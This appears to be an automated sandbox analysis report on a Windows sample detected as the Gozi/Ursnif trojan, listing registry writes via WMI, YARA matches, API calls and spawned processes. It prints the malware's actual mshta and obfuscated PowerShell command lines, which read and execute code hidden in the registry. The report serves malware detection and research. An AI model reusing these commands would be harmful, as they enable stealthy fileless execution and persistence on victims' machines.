                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Writes registry values via WMI
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: main.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 2620, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D82FC0_2_006D82FC
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D2DCC0_2_006D2DCC
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D27920_2_006D2792
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_00401493
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00401D95 GetProcAddress,NtCreateSection,memset,0_2_00401D95
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00401F78 NtMapViewOfSection,0_2_00401F78
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_006D737C
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D8521 NtQueryVirtualMemory,0_2_006D8521
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: main.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: main.exeVirustotal: Detection: 61%
                Source: main.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\main.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\main.exe C:\Users\user\Desktop\main.exe
                Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                Source: C:\Users\user\Desktop\main.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmpv3qo3.pur.ps1Jump to behavior
                Source: classification engineClassification label: mal100.troj.winEXE@5/2@3/1
                Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D7256 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,0_2_006D7256
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_01
                Source: C:\Users\user\Desktop\main.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\main.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006DB859 push 0000006Fh; retf 0_2_006DB85C
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D82EB push ecx; ret 0_2_006D82FB
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D7F00 push ecx; ret 0_2_006D7F09
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_0040134F LoadLibraryA,GetProcAddress,0_2_0040134F

                Hooking and other Techniques for Hiding and Protection

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
